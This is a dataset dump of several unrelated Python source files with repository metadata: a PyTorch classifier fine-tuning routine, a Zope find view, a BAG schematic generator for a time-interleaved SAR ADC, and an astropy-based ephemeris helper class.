        time_elapsed // 60, time_elapsed % 60))
    result_file.writelines('Best val Acc: {:4f}\n'.format(best_acc))
    # Close the results file.
    result_file.close()
    # Load best model weights before returning.
    model.load_state_dict(best_model_wts)
    return model
def start_train(model):
    """Fine-tune `model`'s classifier head for 20 epochs and save the weights.

    Only `model.classifier` parameters are optimized (transfer-learning style);
    the trained state dict is written to pretrained_model/<model.name>.pth.
    Returns the trained model.
    """
    # Class names are not needed for training itself.
    dataloaders, dataset_sizes, _ = get_data_loaders()
    criterion = nn.CrossEntropyLoss()
    # Observe that only parameters of the final (classifier) layer are optimized.
    optimizer_conv = optim.Adam(model.classifier.parameters(), lr=0.01)
    # Decay LR by a factor of 0.01 every 7 epochs (gamma below; the original
    # comment said 0.1, which did not match the code).
    exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=7, gamma=0.01)
    model = train_model(model, criterion, optimizer_conv, exp_lr_scheduler, 20, dataloaders, dataset_sizes)
    PATH = os.path.abspath(os.path.dirname(__file__))
    torch.save(model.state_dict(), os.path.join(PATH, 'pretrained_model', '%s.pth' % (model.name)))
    return model
"seanletter5j@Gmail.com"
] | seanletter5j@Gmail.com |
005852383cf1e3ae176206e5dd95e2754cd001ce | 006341ca12525aa0979d6101600e78c4bd9532ab | /CMS/Zope-3.2.1/Dependencies/zope.app-Zope-3.2.1/zope.app/container/browser/find.py | ee744f8239d12401177ed371c83a4a3a56c523fe | [
"ZPL-2.1",
"Python-2.0",
"ICU",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"ZPL-2.0"
] | permissive | germanfriday/code-examples-sandbox | d0f29e20a3eed1f8430d06441ac2d33bac5e4253 | 4c538584703754c956ca66392fdcecf0a0ca2314 | refs/heads/main | 2023-05-30T22:21:57.918503 | 2021-06-15T15:06:47 | 2021-06-15T15:06:47 | 377,200,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,567 | py | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Find View Class
$Id: find.py 29143 2005-02-14 22:43:16Z srichter $
"""
__docformat__ = 'restructuredtext'
from zope.app import zapi
from zope.app.container.find import SimpleIdFindFilter
from zope.app.container.interfaces import IFind
from zope.app.traversing.api import getName
from zope.app.publisher.browser import BrowserView
# Very simple implementation right now
class Find(BrowserView):
    """Browser view exposing a simple id-based find over a container."""

    def findByIds(self, ids):
        """Do a find for the `ids` listed in `ids`, which is a string."""
        finder = IFind(self.context)
        id_list = ids.split()
        # An empty query means "match nothing", not "match everything".
        if not id_list:
            return []
        request = self.request
        return [
            {'id': getName(obj), 'url': zapi.absoluteURL(obj, request)}
            for obj in finder.find([SimpleIdFindFilter(id_list)])
        ]
| [
"chris@thegermanfriday.com"
] | chris@thegermanfriday.com |
970feb65038f3cbb7891e048c6ec4edf3da55f5c | 27cd4886e5d08cca23bf36e24339ff1155b7db10 | /generators/adc_sar/BagModules/adc_sar_templates/TISARADC.py | 3397c883b0f4ee6cc3c04f5671d08c84f7ffb9ab | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | ucb-art/laygo | 8539accac6e9888122e8e0afd160d294ffb56bfc | 8f62ec1971480cb27cb592421fd97f590379cff9 | refs/heads/master | 2021-01-11T08:49:24.306674 | 2020-06-18T15:01:50 | 2020-06-18T15:01:50 | 194,750,788 | 24 | 9 | null | null | null | null | UTF-8 | Python | false | false | 19,542 | py | # -*- coding: utf-8 -*-
########################################################################################################################
#
# Copyright (c) 2014, Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
########################################################################################################################
from __future__ import (absolute_import, division,
print_function, unicode_literals)
# noinspection PyUnresolvedReferences,PyCompatibility
from builtins import *
import os
import pkg_resources
from bag.design import Module
yaml_file = pkg_resources.resource_filename(__name__, os.path.join('netlist_info', 'TISARADC.yaml'))
# noinspection PyPep8Naming
class adc_sar_templates__TISARADC(Module):
    """Module for library adc_sar_templates cell TISARADC.

    Schematic generator for the top-level time-interleaved SAR ADC: arrays the
    SAR slices (ISAR), optionally instantiates the resistor-ladder DAC (IRDAC)
    for offset/bias voltages, and renames the per-slice pins.
    """
    def __init__(self, bag_config, parent=None, prj=None, **kwargs):
        # Bind this design module to its netlist template (yaml_file, resolved
        # at import time from netlist_info/TISARADC.yaml).
        Module.__init__(self, bag_config, yaml_file, parent=parent, prj=prj, **kwargs)
def design(self,
sar_lch,
sar_pw,
sar_nw,
sar_sa_m, sar_sa_m_d,
sar_sa_m_rst, sar_sa_m_rst_d,
sar_sa_m_rgnn, sar_sa_m_rgnp_d,
sar_sa_m_buf, doubleSA, sar_sa_m_smallrgnp,
vref_sf_m_mirror, vref_sf_m_bias, vref_sf_m_off, vref_sf_m_in, vref_sf_m_bias_dum, vref_sf_m_in_dum,
vref_sf_m_byp, vref_sf_m_byp_bias, vref_sf_bias_current, vref_sf,
sar_drv_m_list, sar_ckgen_m, sar_ckgen_fo,
sar_ckgen_ndelay, sar_ckgen_fast, sar_ckgen_muxfast,
sar_logic_m,
sar_fsm_m,
sar_ret_m,
sar_ret_fo,
sar_device_intent,
sar_c_m,
sar_rdx_array, sar_num_inv_bb,
samp_lch,
samp_wp,
samp_wn,
samp_fgn,
samp_fg_inbuf_list,
samp_fg_outbuf_list,
samp_nduml,
samp_ndumr,
samp_nsep,
samp_intent,
num_bits,
samp_use_laygo, samp_tgate,
sf_lch, sf_nw, sf_m_mirror, sf_m_bias, sf_m_off, sf_m_in, sf_m_bias_dum, sf_m_in_dum, sf_m_byp,
sf_m_byp_bias, sf_intent, bias_current, use_sf,
use_offset, num_slices,
clk_lch,
clk_pw,
clk_nw,
clk_cdac_bits,
clk_m_dff,
clk_m_inv1,
clk_m_inv2,
clk_m_tgate,
clk_n_pd,
clk_m_capsw,
clk_unit_cell,
clk_device_intent,
clk_pulse,
ret_lch,
ret_pw,
ret_nw,
ret_m_ibuf,
ret_m_obuf,
ret_m_latch,
ret_m_srbuf,
ret_m_sr,
ret_device_intent,
input_htree,
generate_dac,
space_msamp,
space_msar,
space_mdecap,
rdac_lch, rdac_pw, rdac_nw, rdac_m, rdac_m_bcap, rdac_num_series, rdac_num_bits, rdac_num_dacs, rdac_device_intent
):
"""To be overridden by subclasses to design this module.
This method should fill in values for all parameters in
self.parameters. To design instances of this module, you can
call their design() method or any other ways you coded.
To modify schematic structure, call:
rename_pin()
delete_instance()
replace_instance_master()
reconnect_instance_terminal()
restore_instance()
array_instance()
"""
self.parameters['sar_lch'] = sar_lch
self.parameters['sar_pw'] = sar_pw
self.parameters['sar_nw'] = sar_nw
self.parameters['sar_sa_m'] = sar_sa_m
self.parameters['sar_sa_m_d'] = sar_sa_m_d
self.parameters['sar_sa_m_rst'] = sar_sa_m_rst
self.parameters['sar_sa_m_rst_d'] = sar_sa_m_rst
self.parameters['sar_sa_m_rgnn'] = sar_sa_m_rgnn
self.parameters['sar_sa_m_rgnp_d'] = sar_sa_m_rgnp_d
self.parameters['sar_sa_m_buf'] = sar_sa_m_buf
self.parameters['doubleSA'] = doubleSA
self.parameters['sar_sa_m_smallrgnp'] = sar_sa_m_smallrgnp
self.parameters['vref_sf_m_mirror'] = vref_sf_m_mirror
self.parameters['vref_sf_m_bias'] = vref_sf_m_bias
self.parameters['vref_sf_m_in'] = vref_sf_m_in
self.parameters['vref_sf_m_off'] = vref_sf_m_off
self.parameters['vref_sf_m_bias_dum'] = vref_sf_m_bias_dum
self.parameters['vref_sf_m_in_dum'] = vref_sf_m_in_dum
self.parameters['vref_sf_m_byp'] = vref_sf_m_byp
self.parameters['vref_sf_m_byp_bias'] = vref_sf_m_byp_bias
self.parameters['vref_sf_bias_current'] = vref_sf_bias_current
self.parameters['vref_sf'] = vref_sf
self.parameters['sar_drv_m_list'] = sar_drv_m_list
self.parameters['sar_ckgen_m'] = sar_ckgen_m
self.parameters['sar_ckgen_fo'] = sar_ckgen_fo
self.parameters['sar_ckgen_ndelay'] = sar_ckgen_ndelay
self.parameters['sar_ckgen_fast'] = sar_ckgen_fast
self.parameters['sar_ckgen_muxfast'] = sar_ckgen_muxfast
self.parameters['sar_logic_m'] = sar_logic_m
self.parameters['sar_fsm_m'] = sar_fsm_m
self.parameters['sar_ret_m'] = sar_ret_m
self.parameters['sar_ret_fo'] = sar_ret_fo
self.parameters['sar_num_inv_bb'] = sar_num_inv_bb
self.parameters['sar_device_intent'] = sar_device_intent
self.parameters['sar_c_m'] = sar_c_m
self.parameters['sar_rdx_array'] = sar_rdx_array
self.parameters['samp_lch'] = samp_lch
self.parameters['samp_wp'] = samp_wp
self.parameters['samp_wn'] = samp_wn
self.parameters['samp_fgn'] = samp_fgn
self.parameters['samp_fg_inbuf_list'] = samp_fg_inbuf_list
self.parameters['samp_fg_outbuf_list'] = samp_fg_outbuf_list
self.parameters['samp_nduml'] = samp_nduml
self.parameters['samp_ndumr'] = samp_ndumr
self.parameters['samp_nsep'] = samp_nsep
self.parameters['samp_intent'] = samp_intent
self.parameters['num_bits'] = num_bits
self.parameters['samp_tgate'] = samp_tgate
self.parameters['samp_use_laygo'] = samp_use_laygo # if true, use laygo for sampler generation
self.parameters['sf_lch'] = sf_lch
self.parameters['sf_nw'] = sf_nw
self.parameters['sf_m_mirror'] = sf_m_mirror
self.parameters['sf_m_bias'] = sf_m_bias
self.parameters['sf_m_in'] = sf_m_in
self.parameters['sf_m_off'] = sf_m_off
self.parameters['sf_m_bias_dum'] = sf_m_bias_dum
self.parameters['sf_m_in_dum'] = sf_m_in_dum
self.parameters['sf_m_byp'] = sf_m_byp
self.parameters['sf_m_byp_bias'] = sf_m_byp_bias
self.parameters['sf_intent'] = sf_intent
self.parameters['use_offset'] = use_offset
self.parameters['num_slices'] = num_slices
self.parameters['clk_lch'] = clk_lch
self.parameters['clk_pw'] = clk_pw
self.parameters['clk_nw'] = clk_nw
self.parameters['clk_cdac_bits'] = clk_cdac_bits
self.parameters['clk_m_dff'] = clk_m_dff
self.parameters['clk_m_inv1'] = clk_m_inv1
self.parameters['clk_m_inv2'] = clk_m_inv2
self.parameters['clk_m_tgate'] = clk_m_tgate
self.parameters['clk_n_pd'] = clk_n_pd
self.parameters['clk_m_capsw'] = clk_m_capsw
self.parameters['clk_unit_cell'] = clk_unit_cell
self.parameters['clk_device_intent'] = clk_device_intent
self.parameters['ret_lch'] = ret_lch
self.parameters['ret_pw'] = ret_pw
self.parameters['ret_nw'] = ret_nw
self.parameters['ret_m_ibuf'] = ret_m_ibuf
self.parameters['ret_m_obuf'] = ret_m_obuf
self.parameters['ret_m_latch'] = ret_m_latch
self.parameters['ret_device_intent'] = ret_device_intent
self.parameters['input_htree'] = input_htree
self.parameters['generate_dac'] = generate_dac
self.parameters['space_msamp'] = space_msamp
self.parameters['space_msar'] = space_msar
self.parameters['space_mdecap'] = space_mdecap
self.parameters['rdac_lch'] = rdac_lch
self.parameters['rdac_pw'] = rdac_pw
self.parameters['rdac_nw'] = rdac_nw
self.parameters['rdac_m'] = rdac_m
self.parameters['rdac_m_bcap'] = rdac_m_bcap
self.parameters['rdac_num_series'] = rdac_num_series
self.parameters['rdac_num_bits'] = rdac_num_bits
self.parameters['rdac_num_dacs'] = rdac_num_dacs
self.parameters['rdac_device_intent'] = rdac_device_intent
# tisaradc_body
if use_sf == True and vref_sf == True:
term_list = [{
','.join(['INP%d' % (i) for i in range(num_slices)]): 'INP',
','.join(['INM%d' % (i) for i in range(num_slices)]): 'INM',
','.join(['OSP%d' % (i) for i in range(num_slices)]):
','.join(['OSP%d' % (i) for i in range(num_slices)]),
','.join(['OSM%d' % (i) for i in range(num_slices)]):
','.join(['OSM%d' % (i) for i in range(num_slices)]),
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]):
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]),
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]):
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]),
','.join(['MODESEL%d' % (i) for i in range(num_slices)]):
','.join(['MODESEL%d' % (i) for i in range(num_slices)]),
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]):
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]),
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]):
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]),
','.join(['SF_Voffp%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<0:%d>'%(num_slices-1),
','.join(['SF_Voffn%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<%d:%d>' % ((num_slices), (num_slices*2 - 1)),
','.join(['SF_BIAS%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<%d>' % (num_slices * 2),
','.join(['VREF_SF_BIAS%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<%d>' % (rdac_num_dacs-1),
}]
elif use_offset == True:
term_list = [{
','.join(['INP%d' % (i) for i in range(num_slices)]): 'INP',
','.join(['INM%d' % (i) for i in range(num_slices)]): 'INM',
','.join(['OSP%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<0:%d>'%(num_slices-1),
','.join(['OSM%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<%d:%d>' % ((num_slices), (num_slices*2 - 1)),
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]):
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]),
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]):
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]),
','.join(['MODESEL%d' % (i) for i in range(num_slices)]):
','.join(['MODESEL%d' % (i) for i in range(num_slices)]),
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]):
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]),
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]):
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]),
}]
elif use_offset == False:
term_list = [{
','.join(['INP%d' % (i) for i in range(num_slices)]): 'INP',
','.join(['INM%d' % (i) for i in range(num_slices)]): 'INM',
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]):
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]),
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]):
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]),
','.join(['MODESEL%d' % (i) for i in range(num_slices)]):
','.join(['MODESEL%d' % (i) for i in range(num_slices)]),
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]):
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]),
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]):
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]),
}]
name_list=(['ISAR'])
self.array_instance('ISAR', name_list, term_list=term_list)
self.instances['ISAR'][0].design(
sar_lch,
sar_pw,
sar_nw,
sar_sa_m, sar_sa_m_d,
sar_sa_m_rst, sar_sa_m_rst_d,
sar_sa_m_rgnn, sar_sa_m_rgnp_d,
sar_sa_m_buf, doubleSA, sar_sa_m_smallrgnp,
vref_sf_m_mirror, vref_sf_m_bias, vref_sf_m_off, vref_sf_m_in, vref_sf_m_bias_dum, vref_sf_m_in_dum,
vref_sf_m_byp, vref_sf_m_byp_bias, vref_sf_bias_current, vref_sf,
sar_drv_m_list, sar_ckgen_m, sar_ckgen_fo,
sar_ckgen_ndelay, sar_ckgen_fast, sar_ckgen_muxfast,
sar_logic_m,
sar_fsm_m,
sar_ret_m,
sar_ret_fo,
sar_device_intent,
sar_c_m,
sar_rdx_array, sar_num_inv_bb,
samp_lch,
samp_wp,
samp_wn,
samp_fgn,
samp_fg_inbuf_list,
samp_fg_outbuf_list,
samp_nduml,
samp_ndumr,
samp_nsep,
samp_intent,
num_bits,
samp_use_laygo, samp_tgate,
sf_lch, sf_nw, sf_m_mirror, sf_m_bias, sf_m_off, sf_m_in, sf_m_bias_dum, sf_m_in_dum, sf_m_byp,
sf_m_byp_bias, sf_intent, bias_current, use_sf,
use_offset, num_slices,
clk_lch,
clk_pw,
clk_nw,
clk_cdac_bits,
clk_m_dff,
clk_m_inv1,
clk_m_inv2,
clk_m_tgate,
clk_n_pd,
clk_m_capsw,
clk_unit_cell,
clk_device_intent,
clk_pulse,
ret_lch,
ret_pw,
ret_nw,
ret_m_ibuf,
ret_m_obuf,
ret_m_latch,
ret_m_srbuf,
ret_m_sr,
ret_device_intent,
input_htree,
space_msamp,
space_msar,
space_mdecap,
)
# RDAC generation
if generate_dac:
self.instances['IRDAC'].design(rdac_lch, rdac_pw, rdac_nw, rdac_m, rdac_m_bcap, rdac_num_series,
rdac_num_bits, rdac_num_dacs, rdac_device_intent)
self.reconnect_instance_terminal(inst_name='IRDAC', term_name='out<%d:0>'%(rdac_num_dacs-1),
net_name='RDAC_OUT<%d:0>'%(rdac_num_dacs-1))
self.reconnect_instance_terminal(inst_name='IRDAC', term_name='SEL<%d:0>'%(rdac_num_dacs*rdac_num_bits-1),
net_name='RDAC_SEL<%d:0>'%(rdac_num_dacs*rdac_num_bits-1))
self.rename_pin('RDAC_SEL', 'RDAC_SEL<%d:0>'%(rdac_num_dacs*rdac_num_bits-1))
else:
self.delete_instance('IRDAC')
self.rename_pin('RDAC_SEL', 'RDAC_OUT<%d:0>'%(rdac_num_dacs-1))
self.rename_pin('CLKCAL', ','.join(['CLKCAL%d<4:0>'%i for i in range(num_slices)]))
self.rename_pin('ASCLKD<3:0>', ','.join(['ASCLKD%d<3:0>'%(i) for i in range(num_slices)]))
self.rename_pin('EXTSEL_CLK', ','.join(['EXTSEL_CLK%d'%(i) for i in range(num_slices)]))
self.rename_pin('ADCOUT', ','.join(['ADCOUT%d<%d:0>'%(i, num_bits-1) for i in range(num_slices)]))
if sar_ckgen_muxfast == True:
self.rename_pin('MODESEL', ','.join(['MODESEL%d'%(i) for i in range(num_slices)]))
else:
self.remove_pin('MODESEL')
if vref_sf == False:
self.remove_pin('VREF_SF_bypass')
#self.remove_pin(','.join(['VREF_SF_BIAS%d' % (i) for i in range(num_slices)]))
if use_sf == False:
self.remove_pin('SF_bypass')
#self.remove_pin(','.join(['SF_BIAS%d' % (i) for i in range(num_slices)]))
#self.remove_pin(','.join(['SF_Voffp%d' % (i) for i in range(num_slices)]))
#self.remove_pin(','.join(['SF_Voffn%d' % (i) for i in range(num_slices)]))
    def get_layout_params(self, **kwargs):
        """Returns a dictionary with layout parameters.

        This method computes the layout parameters used to generate implementation's
        layout. Subclasses should override this method if you need to run post-extraction
        layout.

        Parameters
        ----------
        kwargs :
            any extra parameters you need to generate the layout parameters dictionary.
            Usually you specify layout-specific parameters here, like metal layers of
            input/output, customizable wire sizes, and so on.

        Returns
        -------
        params : dict[str, any]
            the layout parameters dictionary.
        """
        # Layout for this cell is produced by the laygo generator, so no
        # layout parameters are needed here.
        return {}
    def get_layout_pin_mapping(self):
        """Returns the layout pin mapping dictionary.

        This method returns a dictionary used to rename the layout pins, in case they are different
        than the schematic pins.

        Returns
        -------
        pin_mapping : dict[str, str]
            a dictionary from layout pin names to schematic pin names.
        """
        # Layout pins already match the schematic pins; no renaming needed.
        return {}
"richards@eecs.berkeley.edu"
] | richards@eecs.berkeley.edu |
de1807a8bc122d70b558be8cdb65dc46b9c1369c | 5e2473a8b164b0aa8c7f9316cc5371c7dbb4a8d3 | /Code/ephem.py | f146c1d6ea5db2e8b3e5ae1278d2d73dfd4d20eb | [] | no_license | agagnebin/Drift_Rate_Analysis | e108a6d9e315606eaf34feedbf952695a3db00c1 | 917eb7ff3327734dcd8ac0b03e8d0c1c38369117 | refs/heads/main | 2023-07-06T06:23:07.302949 | 2021-08-20T22:08:43 | 2021-08-20T22:08:43 | 393,111,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,248 | py | from astropy import units as u
from astropy.coordinates import Angle, SkyCoord
import numpy as np
#import dateutil
from astropy.convolution import convolve, Gaussian1DKernel
from astropy import constants as Const
from argparse import Namespace
def to_Angle(val, unit='degree'):
    """Return *val* as an astropy Angle; Angle/Quantity inputs pass through."""
    already_angular = isinstance(val, (u.quantity.Quantity, Angle))
    return val if already_angular else Angle(val, unit)
#def to_Time(times, toffset=None):
# """Convert to Time."""
def to_Time(times, toffset=None):
    """Convert a flexible date/time specification into an astropy Time.

    The original body was pasted from a two-argument helper and referenced
    undefined names (`dates`, `get_astropytime`, `ndarray`), so every call
    raised NameError; it is rebound here to the actual (times, toffset)
    parameters.

    Parameters
    ----------
    times : None/False, str, float, datetime, Time, or list/ndarray of these
        Date specification: 'now'/'current', '<' (distant past), '>'
        (distant future), 'YYYY-M-D [HH:MM:SS]' (slashes allowed), a gps
        second count (> 1e9), a julian date (2.4e6-2.5e6), or an existing
        Time/datetime. None/False/'none' return None.
    toffset : float or str, optional
        Hours to add, either numeric or '[-]HH:MM:SS'. Broadcast against
        `times` when either is a list.

    Returns
    -------
    Time or None
    """
    if times is None or times is False:
        return None
    # List handling: broadcast scalars against lists and convert element-wise.
    if isinstance(times, list) or isinstance(toffset, (list, np.ndarray)):
        if isinstance(toffset, np.ndarray):
            toffset = list(toffset)
        if not isinstance(toffset, list):
            toffset = [toffset] * len(times)
        if not isinstance(times, list):
            times = [times] * len(toffset)
        if len(times) != len(toffset):
            raise ValueError("dates/times list lengths must match.")
        return_Time = []
        if len(times) > 1000:
            print("Converting {} time entries - could take a moment.".format(len(times)))
        for _date, _time in zip(times, toffset):
            return_Time.append(to_Time(_date, _time))
        return Time(return_Time)
    if isinstance(times, str):
        if times.lower() == 'none':
            return None
        if times == '<':
            return Time('2000-01-01', scale='utc')
        if times == '>':
            return Time.now() + TimeDelta(1000, format='jd')
        if times.lower() == 'now' or times.lower() == 'current':
            return Time.now()
    if isinstance(times, Time):
        return_Time = times
    elif isinstance(times, datetime):
        return_Time = Time(times, format='datetime')
    else:
        # Separate the float conversion from the range checks so an
        # out-of-range number raises cleanly instead of falling into the
        # string-parsing branch (which would crash on a float).
        try:
            num = float(times)
        except ValueError:
            num = None
        if num is not None:
            if num > 1000000000.0:
                return_Time = Time(num, format='gps')
            elif num > 2400000.0 and num < 2500000.0:
                return_Time = Time(num, format='jd')
            else:
                raise ValueError(f'Invalid format: date as a number should be gps time '
                                 f'or julian date, not {num}.')
        else:
            times = times.replace('/', '-')
            try:
                return_Time = Time(times, scale='utc')
            except ValueError:
                raise ValueError(
                    f'Invalid format: YYYY[/-]M[/-]D [HH:MM:SS], not {times}')
    # Apply the hour offset, if any.
    if toffset is None:
        return return_Time
    try:
        toffset = float(toffset)
        if abs(toffset) < 1E-6:
            return return_Time
        return return_Time + TimeDelta(toffset * 3600.0, format='sec')
    except ValueError:
        pass
    # '[-]HH:MM:SS' string offset.
    sign_of_times = 1.0
    if toffset[0] == '-':
        sign_of_times = -1.0
        toffset = toffset[1:]
    add_time = 0.0
    for i, d in enumerate(toffset.split(':')):
        add_time += (float(d)) * 3600.0 / (60.0**i)
    add_time *= sign_of_times
    return return_Time + TimeDelta(add_time, format='sec')
def to_separation(c1, c2):
    """Angular separation between two coordinates; (ra, dec) pairs are promoted to SkyCoord."""
    def _as_skycoord(coord):
        if isinstance(coord, SkyCoord):
            return coord
        return SkyCoord(to_Angle(coord[0]), to_Angle(coord[1]))
    return _as_skycoord(c1).separation(_as_skycoord(c2))
class BaseEphem:
    # Registry of every ephemeris attribute managed by initall/reset_base/at:
    # time tags, sky/topocentric/cartesian positions, range D, time step dt,
    # and the corresponding rates (…dot) plus range acceleration Ddotdot.
    param = ['times', 'ra', 'dec', 'az', 'el', 'x', 'y', 'z', 'D', 'dt',
             'radot', 'decdot', 'azdot', 'eldot', 'xdot', 'ydot', 'zdot',
             'Ddot', 'Ddotdot']
    def __init__(self):
        """
        Provides an init'd base class for ephemerides per:
        times : Time
        dt : np.array
        ra, dec, az, el: Angle
        radot, decdot, azdot, eldot: deg/sec (Quantity)
        x, y, z: m (Quantity)
        xdot, ydot, zdot, Ddot: m/s (Quantity)
        Ddotdot: m/s/s (Quantity)
        """
        self.initall()
        self._E = None  # Class archive for interp (filled lazily by reset_base)
        self.c0 = Const.c  # Get used constants handy
        self.au = Const.au
        self.ly = 1.0 * u.lyr.to('m')  # one light-year in meters (plain float)
def initall(self, **kwargs):
for par in self.param:
if par in kwargs.keys():
setattr(self, par, kwargs[par])
else:
setattr(self, par, [])
def elapsed(self, unit='hour'):
elpsd = (self.times.jd - self.times[0].jd)
if unit == 'hour':
elpsd *= 24.0
elif unit.startswith('m'):
elpsd *= (24.0 * 60.0)
elif unit.startswith('s'):
elpsd *= (24.0 * 3600.0)
return elpsd
def to_Time(self, times='times', toffset=None):
"""
Convert the array to Time and set as self.times.
If str, then convert class 'times' variable.
"""
if isinstance(times, str) and times == 'times':
times = self.times
self.times = to_Time(times, toffset)
def to_Angle(self, ang, angle_unit=u.degree, angv=None):
"""
Convert attribute ang to class array.
"""
if angv is None:
angv = getattr(self, ang)
setattr(self, ang, to_Angle(angv, angle_unit))
def interp(self, par, times):
"""
Interpolate attribute par onto times.
par : str
string of the attribute to use
times : Time
times to be interpolated onto.
"""
if self._E is None:
self.reset_base()
clpar = getattr(self._E, f"{par}")
if not len(clpar):
return clpar
try:
parunit = clpar.unit
except AttributeError:
return np.interp(times.jd, self._E.times.jd, clpar)
return u.Quantity(np.interp(times.jd, self._E.times.jd, clpar), parunit)
def reset_base(self):
if self._E is None:
self._E = Namespace()
for par in self.param:
setattr(self._E, par, getattr(self, par))
def at(self, times=None):
"""
Put all data at "times". None to self._E data.
"""
if self._E is None: # Set ephem archive data
self.reset_base()
if times is None:
for par in self.param:
setattr(self, par, getattr(self._E, par))
else:
self.to_Time(times)
for par in self.param:
if par != 'times':
setattr(self, par, self.interp(par, times))
def calc_dt(self):
"""
Compute self.dt in sec as ndarray Quantity.
"""
self.dt = [0.0] # in seconds
for i, _t in enumerate(self.times[1:]):
self.dt.append((_t - self.times[i]).value * 3600.0 * 24.0)
self.dt[0] = self.dt[1]
self.dt = np.array(self.dt) * u.second
def smooth_array(self, arr, smooth):
try:
anit = arr.unit
except AttributeError:
anit = None
if smooth:
if anit is not None:
return u.Quantity(convolve(arr, Gaussian1DKernel(smooth), boundary='extend'), anit)
else:
return convolve(arr, Gaussian1DKernel(smooth), boundary='extend')
else:
return arr
def vis(self, arr, val=0.0, horizon=0.0):
"""
Get filter for visible above horizon. Those below the horizon are set to val.
Usage is to call e.g. visible_doppler = self.vis(self.doppler)
"""
varr = np.array(arr)
varr[np.where(self.el < horizon)] = val
return varr
    def dbydt(self, par, smooth=None, unwrap=False):
        """
        Numerically differentiate attribute `par` with respect to time and
        store the result as `<par>dot` (a Quantity) on the same namespace.

        par : str
            attribute name; 'sub.attr' differentiates an attribute living on
            a sub-namespace of self
        smooth : int or None
            Gaussian kernel width passed to smooth_array before differencing
        unwrap : bool
            apply np.unwrap first (for cyclic angles in radians)
        """
        if '.' in par:
            # 'sub.attr' form: the derivative is stored on the sub-namespace.
            ns = getattr(self, par.split('.')[0])
            par = par.split('.')[1]
        else:
            ns = self
        # Ensure dt exists and matches the data length.
        if self.dt is None or len(self.dt) != len(getattr(ns, par)):
            self.calc_dt()
        deriv = f"{par}dot"
        # Seed with a placeholder; element 0 is overwritten with element 1
        # below so the derivative array matches the data length.
        setattr(ns, deriv, [0.0])
        if unwrap:
            _param = np.unwrap(getattr(ns, par))
        else:
            _param = getattr(ns, par)
        _param = self.smooth_array(_param, smooth)
        # Backward differences: d[i] = (p[i] - p[i-1]) / dt[i].
        for i, _pp in enumerate(_param[1:]):
            getattr(ns, deriv).append((_pp - _param[i]) / self.dt[i + 1])
        getattr(ns, deriv)[0] = getattr(ns, deriv)[1]
